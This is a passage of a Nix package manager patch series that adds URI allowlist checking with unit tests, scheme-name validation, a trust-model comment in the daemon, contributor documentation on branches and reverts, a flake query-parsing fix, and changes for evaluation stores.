side. + * + * We make this fail for now so we can implement this properly later + * without it being a breaking change. + */ + void repairPath(const StorePath & path) override + { unsupported("repairPath"); } + + void computeFSClosure(const StorePathSet & paths, + StorePathSet & out, bool flipDirection = false, + bool includeOutputs = false, bool includeDerivers = false) override; + + StorePathSet queryValidPaths(const StorePathSet & paths, + SubstituteFlag maybeSubstitute = NoSubstitute) override; + + void connect() override; + + unsigned int getProtocol() override; + + /** + * The legacy ssh protocol doesn't support checking for trusted-user. + * Try using ssh-ng:// instead if you want to know. + */ + std::optional isTrustedClient() override + { + return std::nullopt; + } + + void queryRealisationUncached(const DrvOutput &, + Callback> callback) noexcept override + // TODO: Implement + { unsupported("queryRealisation"); } +}; + +} From e43bb655feaa23977322d68278c88ac075eb2c41 Mon Sep 17 00:00:00 2001 From: Adam Joseph Date: Sun, 10 Dec 2023 13:58:35 -0800 Subject: [PATCH 086/654] libstore/daemon.cc: note trust model difference in readDerivation()s Below the comment added by this commit is a much longer comment followed by a trust check, both of which have confused me on at least two occasions. I figured it out once, forgot it, then had to ask @Ericson2314 to explain it, at which point I understood it again. I think this might confuse other people too, or maybe I will just forget it a third time. So let's add a comment. Farther down in the function is the following check: ``` if (!(drvType.isCA() || trusted)) throw Error("you are not privileged to build input-addressed derivations"); ``` This seems really strange at first. A key property of Nix is that you can compute the outpath of a derivation using the derivation (and its references-closure) without trusting anybody!
The missing insight is that at this point in the code the builder doesn't necessarily have the references-closure of the derivation being built, and therefore needs to trust that the derivation's outPath is honest. It's incredibly easy to overlook this, because the only difference between these two cases is which of these identically-named functions we used: - `readDerivation(Source,Store)` - `Store::readDerivation()` These functions have different trust models (except in the special case where the first function is used on the local store). We should call the reader's attention to this fact. Co-authored-by: Cole Helbling --- src/libstore/daemon.cc | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 530b1a178..a112d6d31 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -574,6 +574,15 @@ static void performOp(TunnelLogger * logger, ref store, case WorkerProto::Op::BuildDerivation: { auto drvPath = store->parseStorePath(readString(from)); BasicDerivation drv; + /* + * Note: unlike wopEnsurePath, this operation reads a + * derivation-to-be-realized from the client with + * readDerivation(Source,Store) rather than reading it from + * the local store with Store::readDerivation(). Since the + * derivation-to-be-realized is not registered in the store + * it cannot be trusted that its outPath was calculated + * correctly. 
+ */ readDerivation(from, *store, drv, Derivation::nameFromPath(drvPath)); BuildMode buildMode = (BuildMode) readInt(from); logger->startWork(); From 91ba7b230777e3fb023bda48c269d533702e50e8 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 12:41:47 +0100 Subject: [PATCH 087/654] isAllowedURI: Extract function and test --- src/libexpr/eval.cc | 18 +++++-- src/libexpr/eval.hh | 5 ++ tests/unit/libexpr/eval.cc | 106 +++++++++++++++++++++++++++++++++++++ 3 files changed, 124 insertions(+), 5 deletions(-) create mode 100644 tests/unit/libexpr/eval.cc diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e494148e..0eb6f406e 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -599,21 +599,29 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } -void EvalState::checkURI(const std::string & uri) +bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { - if (!evalSettings.restrictEval) return; - /* 'uri' should be equal to a prefix, or in a subdirectory of a prefix. Thus, the prefix https://github.co does not permit access to https://github.com. Note: this allows 'http://' and 'https://' as prefixes for any http/https URI. */ - for (auto & prefix : evalSettings.allowedUris.get()) + for (auto & prefix : allowedUris) { if (uri == prefix || (uri.size() > prefix.size() && prefix.size() > 0 && hasPrefix(uri, prefix) && (prefix[prefix.size() - 1] == '/' || uri[prefix.size()] == '/'))) - return; + return true; + } + + return false; +} + +void EvalState::checkURI(const std::string & uri) +{ + if (!evalSettings.restrictEval) return; + + if (isAllowedURI(uri, evalSettings.allowedUris.get())) return; /* If the URI is a path, then check it against allowedPaths as well. 
*/ diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..6008c3f60 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -837,6 +837,11 @@ std::string showType(const Value & v); */ SourcePath resolveExprPath(SourcePath path); +/** + * Whether a URI is allowed, assuming restrictEval is enabled + */ +bool isAllowedURI(std::string_view uri, const Strings & allowedPaths); + struct InvalidPathError : EvalError { Path path; diff --git a/tests/unit/libexpr/eval.cc b/tests/unit/libexpr/eval.cc new file mode 100644 index 000000000..cc5d6bbfa --- /dev/null +++ b/tests/unit/libexpr/eval.cc @@ -0,0 +1,106 @@ +#include +#include + +#include "eval.hh" +#include "tests/libexpr.hh" + +namespace nix { + +TEST(nix_isAllowedURI, http_example_com) { + Strings allowed; + allowed.push_back("http://example.com"); + + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.co", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.como", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org/foo", allowed)); +} + +TEST(nix_isAllowedURI, http_example_com_foo) { + Strings allowed; + allowed.push_back("http://example.com/foo"); + + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.como", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org/foo", allowed)); + // Broken? 
+ // ASSERT_TRUE(isAllowedURI("http://example.com/foo?ok=1", allowed)); +} + +TEST(nix_isAllowedURI, http) { + Strings allowed; + allowed.push_back("http://"); + + ASSERT_TRUE(isAllowedURI("http://", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("https://", allowed)); + ASSERT_FALSE(isAllowedURI("http:foo", allowed)); +} + +TEST(nix_isAllowedURI, https) { + Strings allowed; + allowed.push_back("https://"); + + ASSERT_TRUE(isAllowedURI("https://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("https://example.com/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/https:", allowed)); +} + +TEST(nix_isAllowedURI, absolute_path) { + Strings allowed; + allowed.push_back("/var/evil"); // bad idea + + ASSERT_TRUE(isAllowedURI("/var/evil", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/foo", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil/foo", allowed)); +} + +TEST(nix_isAllowedURI, file_url) { + Strings allowed; + allowed.push_back("file:///var/evil"); // bad idea + + ASSERT_TRUE(isAllowedURI("file:///var/evil", allowed)); + ASSERT_TRUE(isAllowedURI("file:///var/evil/", allowed)); + 
ASSERT_TRUE(isAllowedURI("file:///var/evil/foo", allowed)); + ASSERT_TRUE(isAllowedURI("file:///var/evil/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http:///var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://var/evil/", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("file:///", allowed)); + ASSERT_FALSE(isAllowedURI("file://", allowed)); +} + +} // namespace nix \ No newline at end of file From 6cbba914a70eb5da6447fee5528a63723ed13245 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 12:43:20 +0100 Subject: [PATCH 088/654] isAllowedURI: Remove incorrect note --- src/libexpr/eval.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0eb6f406e..d8a36fa02 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -603,8 +603,7 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { /* 'uri' should be equal to a prefix, or in a subdirectory of a prefix. Thus, the prefix https://github.co does not permit - access to https://github.com. Note: this allows 'http://' and - 'https://' as prefixes for any http/https URI. */ + access to https://github.com. 
*/ for (auto & prefix : allowedUris) { if (uri == prefix || (uri.size() > prefix.size() From 1fa958dda1ef0cb37441ef8d1a84faf6d501ac12 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 14:08:22 +0100 Subject: [PATCH 089/654] isAllowedURI: Format --- src/libexpr/eval.cc | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index d8a36fa02..9e541f293 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -605,11 +605,14 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) prefix. Thus, the prefix https://github.co does not permit access to https://github.com. */ for (auto & prefix : allowedUris) { - if (uri == prefix || - (uri.size() > prefix.size() - && prefix.size() > 0 - && hasPrefix(uri, prefix) - && (prefix[prefix.size() - 1] == '/' || uri[prefix.size()] == '/'))) + if (uri == prefix + // Allow access to subdirectories of the prefix. + || (uri.size() > prefix.size() + && prefix.size() > 0 + && hasPrefix(uri, prefix) + && ( + prefix[prefix.size() - 1] == '/' + || uri[prefix.size()] == '/'))) return true; } From 79eb2920bb51c7ec9528a403986e79f04738e2be Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 14:39:49 +0100 Subject: [PATCH 090/654] Add nix::isASCII*, locale-independent --- src/libutil/string.hh | 17 +++++++++++ tests/unit/libutil/string.cc | 59 ++++++++++++++++++++++++++++++++++++ 2 files changed, 76 insertions(+) create mode 100644 src/libutil/string.hh create mode 100644 tests/unit/libutil/string.cc diff --git a/src/libutil/string.hh b/src/libutil/string.hh new file mode 100644 index 000000000..16ef75643 --- /dev/null +++ b/src/libutil/string.hh @@ -0,0 +1,17 @@ +#pragma once + +namespace nix { + + /** Locale-independent version of std::islower(). */ + inline bool isASCIILower(char c) { return c >= 'a' && c <= 'z'; }; + + /** Locale-independent version of std::isupper(). 
*/ + inline bool isASCIIUpper(char c) { return c >= 'A' && c <= 'Z'; }; + + /** Locale-independent version of std::isalpha(). */ + inline bool isASCIIAlpha(char c) { return isASCIILower(c) || isASCIIUpper(c); }; + + /** Locale-independent version of std::isdigit(). */ + inline bool isASCIIDigit(char c) { return c >= '0' && c <= '9'; }; + +} diff --git a/tests/unit/libutil/string.cc b/tests/unit/libutil/string.cc new file mode 100644 index 000000000..381f2cc15 --- /dev/null +++ b/tests/unit/libutil/string.cc @@ -0,0 +1,59 @@ +#include +#include "string.hh" + +namespace nix { + +TEST(string, isASCIILower) { + ASSERT_TRUE(isASCIILower('a')); + ASSERT_TRUE(isASCIILower('z')); + ASSERT_FALSE(isASCIILower('A')); + ASSERT_FALSE(isASCIILower('Z')); + ASSERT_FALSE(isASCIILower('0')); + ASSERT_FALSE(isASCIILower('9')); + ASSERT_FALSE(isASCIILower(' ')); + ASSERT_FALSE(isASCIILower('\n')); + ASSERT_FALSE(isASCIILower('\t')); + ASSERT_FALSE(isASCIILower(':')); +} + +TEST(string, isASCIIUpper) { + ASSERT_FALSE(isASCIIUpper('a')); + ASSERT_FALSE(isASCIIUpper('z')); + ASSERT_TRUE(isASCIIUpper('A')); + ASSERT_TRUE(isASCIIUpper('Z')); + ASSERT_FALSE(isASCIIUpper('0')); + ASSERT_FALSE(isASCIIUpper('9')); + ASSERT_FALSE(isASCIIUpper(' ')); + ASSERT_FALSE(isASCIIUpper('\n')); + ASSERT_FALSE(isASCIIUpper('\t')); + ASSERT_FALSE(isASCIIUpper(':')); +} + +TEST(string, isASCIIAlpha) { + ASSERT_TRUE(isASCIIAlpha('a')); + ASSERT_TRUE(isASCIIAlpha('z')); + ASSERT_TRUE(isASCIIAlpha('A')); + ASSERT_TRUE(isASCIIAlpha('Z')); + ASSERT_FALSE(isASCIIAlpha('0')); + ASSERT_FALSE(isASCIIAlpha('9')); + ASSERT_FALSE(isASCIIAlpha(' ')); + ASSERT_FALSE(isASCIIAlpha('\n')); + ASSERT_FALSE(isASCIIAlpha('\t')); + ASSERT_FALSE(isASCIIAlpha(':')); +} + +TEST(string, isASCIIDigit) { + ASSERT_FALSE(isASCIIDigit('a')); + ASSERT_FALSE(isASCIIDigit('z')); + ASSERT_FALSE(isASCIIDigit('A')); + ASSERT_FALSE(isASCIIDigit('Z')); + ASSERT_TRUE(isASCIIDigit('0')); + ASSERT_TRUE(isASCIIDigit('1')); + 
ASSERT_TRUE(isASCIIDigit('9')); + ASSERT_FALSE(isASCIIDigit(' ')); + ASSERT_FALSE(isASCIIDigit('\n')); + ASSERT_FALSE(isASCIIDigit('\t')); + ASSERT_FALSE(isASCIIDigit(':')); +} + +} \ No newline at end of file From d3a85b68347071d8d93ec796a38c707483d7b272 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 15:14:41 +0100 Subject: [PATCH 091/654] isValidSchemeName: Add function --- src/libutil/url.cc | 17 +++++++++++++++++ src/libutil/url.hh | 9 +++++++++ tests/unit/libutil/url.cc | 18 ++++++++++++++++++ 3 files changed, 44 insertions(+) diff --git a/src/libutil/url.cc b/src/libutil/url.cc index 57b64d607..f2d5f1782 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -3,6 +3,7 @@ #include "util.hh" #include "split.hh" #include "canon-path.hh" +#include "string.hh" namespace nix { @@ -183,4 +184,20 @@ std::string fixGitURL(const std::string & url) } } +// https://www.rfc-editor.org/rfc/rfc3986#section-3.1 +bool isValidSchemeName(std::string_view s) +{ + if (s.empty()) return false; + if (!isASCIIAlpha(s[0])) return false; + for (auto c : s.substr(1)) { + if (isASCIIAlpha(c)) continue; + if (isASCIIDigit(c)) continue; + if (c == '+') continue; + if (c == '-') continue; + if (c == '.') continue; + return false; + } + return true; +} + } diff --git a/src/libutil/url.hh b/src/libutil/url.hh index 833f54678..24806bbff 100644 --- a/src/libutil/url.hh +++ b/src/libutil/url.hh @@ -55,4 +55,13 @@ ParsedUrlScheme parseUrlScheme(std::string_view scheme); changes absolute paths into file:// URLs. */ std::string fixGitURL(const std::string & url); +/** + * Whether a string is valid as RFC 3986 scheme name. + * Colon `:` is part of the URI; not the scheme name, and therefore rejected. + * See https://www.rfc-editor.org/rfc/rfc3986#section-3.1 + * + * Does not check whether the scheme is understood, as that's context-dependent. 
+ */ +bool isValidSchemeName(std::string_view scheme); + } diff --git a/tests/unit/libutil/url.cc b/tests/unit/libutil/url.cc index a678dad20..09fa4e218 100644 --- a/tests/unit/libutil/url.cc +++ b/tests/unit/libutil/url.cc @@ -344,4 +344,22 @@ namespace nix { ASSERT_EQ(percentDecode(e), s); } +TEST(nix, isValidSchemeName) { + ASSERT_TRUE(isValidSchemeName("http")); + ASSERT_TRUE(isValidSchemeName("https")); + ASSERT_TRUE(isValidSchemeName("file")); + ASSERT_TRUE(isValidSchemeName("file+https")); + ASSERT_TRUE(isValidSchemeName("fi.le")); + ASSERT_TRUE(isValidSchemeName("file-ssh")); + ASSERT_TRUE(isValidSchemeName("file+")); + ASSERT_TRUE(isValidSchemeName("file.")); + ASSERT_TRUE(isValidSchemeName("file1")); + ASSERT_FALSE(isValidSchemeName("file:")); + ASSERT_FALSE(isValidSchemeName("file/")); + ASSERT_FALSE(isValidSchemeName("+file")); + ASSERT_FALSE(isValidSchemeName(".file")); + ASSERT_FALSE(isValidSchemeName("-file")); + ASSERT_FALSE(isValidSchemeName("1file")); +} + } From a05bc9eb92371af631fc9fb83c3595957fb56943 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 15:27:29 +0100 Subject: [PATCH 092/654] allowed-uris: Match whole schemes also when scheme is not followed by slashes --- ...llowed-uris-can-now-match-whole-schemes.md | 7 ++++ src/libexpr/eval-settings.hh | 5 +++ src/libexpr/eval.cc | 17 ++++++++- tests/unit/libexpr/eval.cc | 35 +++++++++++++++++++ 4 files changed, 63 insertions(+), 1 deletion(-) create mode 100644 doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md diff --git a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md new file mode 100644 index 000000000..3cf75a612 --- /dev/null +++ b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md @@ -0,0 +1,7 @@ +--- +synopsis: Option `allowed-uris` can now match whole schemes in URIs without slashes +prs: 9547 +--- + +If a scheme, such as `github:` is specified in the `allowed-uris` 
option, all URIs starting with `github:` are allowed. +Previously this only worked for schemes whose URIs used the `://` syntax. diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index db2971acb..3009a462c 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -68,6 +68,11 @@ struct EvalSettings : Config evaluation mode. For example, when set to `https://github.com/NixOS`, builtin functions such as `fetchGit` are allowed to access `https://github.com/NixOS/patchelf.git`. + + Access is granted when + - the URI is equal to the prefix, + - or the URI is a subpath of the prefix, + - or the prefix is a URI scheme ended by a colon `:` and the URI has the same scheme. )"}; Setting traceFunctionCalls{this, false, "trace-function-calls", diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e541f293..1552e3e92 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -18,6 +18,7 @@ #include "memory-input-accessor.hh" #include "signals.hh" #include "gc-small-vector.hh" +#include "url.hh" #include #include @@ -599,6 +600,14 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } +inline static bool isJustSchemePrefix(std::string_view prefix) +{ + return + !prefix.empty() + && prefix[prefix.size() - 1] == ':' + && isValidSchemeName(prefix.substr(0, prefix.size() - 1)); +} + bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { /* 'uri' should be equal to a prefix, or in a subdirectory of a @@ -611,8 +620,14 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) && prefix.size() > 0 && hasPrefix(uri, prefix) && ( + // Allow access to subdirectories of the prefix. 
prefix[prefix.size() - 1] == '/' - || uri[prefix.size()] == '/'))) + || uri[prefix.size()] == '/' + + // Allow access to whole schemes + || isJustSchemePrefix(prefix) + ) + )) return true; } diff --git a/tests/unit/libexpr/eval.cc b/tests/unit/libexpr/eval.cc index cc5d6bbfa..93d3f658f 100644 --- a/tests/unit/libexpr/eval.cc +++ b/tests/unit/libexpr/eval.cc @@ -103,4 +103,39 @@ TEST(nix_isAllowedURI, file_url) { ASSERT_FALSE(isAllowedURI("file://", allowed)); } +TEST(nix_isAllowedURI, github_all) { + Strings allowed; + allowed.push_back("github:"); + ASSERT_TRUE(isAllowedURI("github:", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar?ref=refs/heads/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github://foo/bar", allowed)); + ASSERT_FALSE(isAllowedURI("https://github:443/foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file://github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file:///github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("github", allowed)); +} + +TEST(nix_isAllowedURI, github_org) { + Strings allowed; + allowed.push_back("github:foo"); + ASSERT_FALSE(isAllowedURI("github:", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar?ref=refs/heads/feat-multi-bar", allowed)); + ASSERT_FALSE(isAllowedURI("github://foo/bar", allowed)); + ASSERT_FALSE(isAllowedURI("https://github:443/foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file://github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file:///github:foo/bar/archive/master.tar.gz", allowed)); +} + +TEST(nix_isAllowedURI, non_scheme_colon) { + Strings allowed; + allowed.push_back("https://foo/bar:"); + 
ASSERT_TRUE(isAllowedURI("https://foo/bar:", allowed)); + ASSERT_TRUE(isAllowedURI("https://foo/bar:/baz", allowed)); + ASSERT_FALSE(isAllowedURI("https://foo/bar:baz", allowed)); +} + } // namespace nix \ No newline at end of file From 89cf53648ca98434a40b0c0cef51fa64f6e0fa37 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 12:26:31 +0100 Subject: [PATCH 093/654] Contributing branches and reverting (#9577) Co-authored-by: Valentin Gagarin --- doc/manual/src/contributing/hacking.md | 42 ++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 237eff925..4d3d66397 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -282,3 +282,45 @@ See also the [format documentation](https://github.com/haskell/cabal/blob/master Releases have a precomputed `rl-MAJOR.MINOR.md`, and no `rl-next.md`. Set `buildUnreleasedNotes = true;` in `flake.nix` to build the release notes on the fly. + +## Branches + +- [`master`](https://github.com/NixOS/nix/commits/master) + + The main development branch. All changes are approved and merged here. + When developing a change, create a branch based on the latest `master`. + + Maintainers try to [keep it in a release-worthy state](#reverting). + +- [`maintenance-*.*`](https://github.com/NixOS/nix/branches/all?query=maintenance) + + These branches are the subject of backports only, and are + also [kept](#reverting) in a release-worthy state. + + See [`maintainers/backporting.md`](https://github.com/NixOS/nix/blob/master/maintainers/backporting.md) + +- [`latest-release`](https://github.com/NixOS/nix/tree/latest-release) + + The latest patch release of the latest minor version. 
+ + See [`maintainers/release-process.md`](https://github.com/NixOS/nix/blob/master/maintainers/release-process.md) + +- [`backport-*-to-*`](https://github.com/NixOS/nix/branches/all?query=backport) + + Generally branches created by the backport action. + + See [`maintainers/backporting.md`](https://github.com/NixOS/nix/blob/master/maintainers/backporting.md) + +- [_other_](https://github.com/NixOS/nix/branches/all) + + Branches that do not conform to the above patterns should be feature branches. + +## Reverting + +If a change turns out to be merged by mistake, or contain a regression, it may be reverted. +A revert is not a rejection of the contribution, but merely part of an effective development process. +It makes sure that development keeps running smoothly, with minimal uncertainty, and less overhead. +If maintainers have to worry too much about avoiding reverts, they would not be able to merge as much. +By embracing reverts as a good part of the development process, everyone wins. + +However, taking a step back may be frustrating, so maintainers will be extra supportive on the next try. 
From f45d2ee2b7090560fc30a227d638684268af700d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Fabian=20M=C3=B6ller?= Date: Mon, 11 Dec 2023 16:02:09 +0100 Subject: [PATCH 094/654] Fix query parsing for path-like flakes --- src/libexpr/flake/flakeref.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc index 16f45ace7..8b0eb7460 100644 --- a/src/libexpr/flake/flakeref.cc +++ b/src/libexpr/flake/flakeref.cc @@ -90,7 +90,7 @@ std::pair parsePathFlakeRefWithFragment( fragment = percentDecode(url.substr(fragmentStart+1)); } if (pathEnd != std::string::npos && fragmentStart != std::string::npos) { - query = decodeQuery(url.substr(pathEnd+1, fragmentStart)); + query = decodeQuery(url.substr(pathEnd+1, fragmentStart-pathEnd-1)); } if (baseDir) { From 994f1b5c0de44319992ef6b1b106cee3fa400dc4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Fabian=20M=C3=B6ller?= Date: Mon, 11 Dec 2023 16:05:34 +0100 Subject: [PATCH 095/654] Add test cases for flake urls with fragments --- tests/functional/flakes/flakes.sh | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh index ccf1699f9..7506b6b3b 100644 --- a/tests/functional/flakes/flakes.sh +++ b/tests/functional/flakes/flakes.sh @@ -193,6 +193,14 @@ nix build -o "$TEST_ROOT/result" flake1 nix build -o "$TEST_ROOT/result" "$flake1Dir" nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir" +# Test explicit packages.default. +nix build -o "$TEST_ROOT/result" "$flake1Dir#default" +nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir#default" + +# Test explicit packages.default with query. +nix build -o "$TEST_ROOT/result" "$flake1Dir?ref=HEAD#default" +nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir?ref=HEAD#default" + # Check that store symlinks inside a flake are not interpreted as flakes. 
nix build -o "$flake1Dir/result" "git+file://$flake1Dir" nix path-info "$flake1Dir/result" From 5f30c8acc7e0cad08924cc53e350e811d097fae7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 18:51:23 -0500 Subject: [PATCH 096/654] Give `Store::queryDerivationOutputMap` and `evalStore` argument Picking up where https://github.com/NixOS/nix/pull/9563 left off. --- src/libstore/store-api.cc | 4 ++-- src/libstore/store-api.hh | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 800df7fa0..7f35e74af 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -547,8 +547,8 @@ std::map> Store::queryPartialDerivationOut return outputs; } -OutputPathMap Store::queryDerivationOutputMap(const StorePath & path) { - auto resp = queryPartialDerivationOutputMap(path); +OutputPathMap Store::queryDerivationOutputMap(const StorePath & path, Store * evalStore) { + auto resp = queryPartialDerivationOutputMap(path, evalStore); OutputPathMap result; for (auto & [outName, optOutPath] : resp) { if (!optOutPath) diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index ada6699d5..13e5a1446 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -369,7 +369,7 @@ public: * Query the mapping outputName=>outputPath for the given derivation. * Assume every output has a mapping and throw an exception otherwise. */ - OutputPathMap queryDerivationOutputMap(const StorePath & path); + OutputPathMap queryDerivationOutputMap(const StorePath & path, Store * evalStore = nullptr); /** * Query the full store path given the hash part of a valid store From 9f39dda66ce0f92707d4be05d0a90961c78f8bd4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 21:21:21 -0500 Subject: [PATCH 097/654] Fix building CA derivations with and eval store I don't love the way this code looks. 
There are two larger problems: - eval, build/scratch, destination stores (#5025) should have different types to reflect the fact that they are used for different purposes and those purposes correspond to different operations. It should be impossible to "use the wrong store" in my cases. - Since drvs can end up in both the eval and build/scratch store, we should have some sort of union/layered store (not on the file sytem level, just conceptual level) that allows accessing both. This would get rid of the ugly "check both" boilerplate in this PR. Still, it might be better to land this now / soon after minimal cleanup, so we have a concrete idea of what problem better abstractions are supposed to solve. --- src/libstore/build/derivation-goal.cc | 51 +++++++++++++++++++++------ src/libstore/misc.cc | 9 +++-- src/libstore/store-api.hh | 3 +- src/nix-build/nix-build.cc | 6 ++-- tests/functional/ca/eval-store.sh | 10 ++++++ tests/functional/ca/local.mk | 1 + tests/functional/eval-store.sh | 16 +++++++-- 7 files changed, 76 insertions(+), 20 deletions(-) create mode 100644 tests/functional/ca/eval-store.sh diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index d4da374ba..f8728ed4a 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -196,10 +196,19 @@ void DerivationGoal::loadDerivation() things being garbage collected while we're busy. */ worker.evalStore.addTempRoot(drvPath); - assert(worker.evalStore.isValidPath(drvPath)); 